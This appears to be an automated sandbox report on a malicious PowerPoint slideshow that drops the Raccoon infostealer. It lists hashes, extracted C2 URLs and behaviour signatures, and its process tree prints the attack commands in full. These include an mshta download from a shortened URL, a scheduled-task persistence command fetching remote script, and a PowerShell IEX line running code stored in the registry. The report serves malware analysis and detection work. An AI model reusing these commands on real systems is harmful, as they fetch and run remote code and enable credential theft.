Analysis
-
max time kernel
135s -
max time network
136s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
19-04-2021 12:22
General
-
Target
a621e8ce92943201dce4f5965fa4199b.pps
-
Size
62KB
-
MD5
a621e8ce92943201dce4f5965fa4199b
-
SHA1
d0c4e4d68327803cce5a31bf1b375faee2a3ebb9
-
SHA256
4091dc5f238a7795b1ade8879c2bc7c9ac85ab1f107c2d1c3ac16a8da871ff7d
-
SHA512
c7a4c42904a5aed4f8a381e3c92f20c9e8c164519b0e194ae4fea49c1de097818540f437ca15e6e875eab6ea93be9eebf9a92895abc8710c96bfb1be972e9107
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://%6786d78asd6786d78asd%6786d78asd%6786d78asd@j.mp/dmaddwwmwdiwdmddwdwnudnwdxx
Extracted
Family
raccoon
Botnet
e4dbb69554a4dcf2a21c14794d523a7e729dc429
Attributes
-
url4cnc
https://telete.in/telehabarik
rc4.plain
rc4.plain
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Blocklisted process makes network request 12 IoCs
-
Loads dropped DLL 1 IoCs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 45 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 35 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\a621e8ce92943201dce4f5965fa4199b.pps" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\mshta.exe"mshta""https://%6786d78asd6786d78asd%6786d78asd%6786d78asd@j.mp/dmaddwwmwdiwdmddwdwnudnwdxx"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@getyournewblog.blogspot.com/p/42.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2348 -s 24643⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 15443⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
memory/432-182-0x0000000000000000-mapping.dmp
-
memory/2116-114-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmpFilesize
64KB
-
memory/2116-115-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmpFilesize
64KB
-
memory/2116-116-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmpFilesize
64KB
-
memory/2116-117-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmpFilesize
64KB
-
memory/2116-119-0x00007FF8383E0000-0x00007FF8383F0000-memory.dmpFilesize
64KB
-
memory/2116-118-0x00007FF85AE50000-0x00007FF85CA2D000-memory.dmpFilesize
27.9MB
-
memory/2116-122-0x00000164968A0000-0x000001649798E000-memory.dmpFilesize
16.9MB
-
memory/2116-123-0x00007FF851AB0000-0x00007FF8539A5000-memory.dmpFilesize
31.0MB
-
memory/2116-179-0x00000164A4C50000-0x00000164A4C54000-memory.dmpFilesize
16KB
-
memory/2348-180-0x0000000000000000-mapping.dmp
-
memory/2380-186-0x0000022062BB6000-0x0000022062BB8000-memory.dmpFilesize
8KB
-
memory/2380-184-0x0000022062BB0000-0x0000022062BB2000-memory.dmpFilesize
8KB
-
memory/2380-185-0x0000022062BB3000-0x0000022062BB5000-memory.dmpFilesize
8KB
-
memory/2380-187-0x0000022062BB8000-0x0000022062BB9000-memory.dmpFilesize
4KB
-
memory/2636-183-0x0000000000000000-mapping.dmp
-
memory/3292-181-0x0000000000000000-mapping.dmp
-
memory/4300-188-0x000000000043DC5B-mapping.dmp
-
memory/4300-189-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB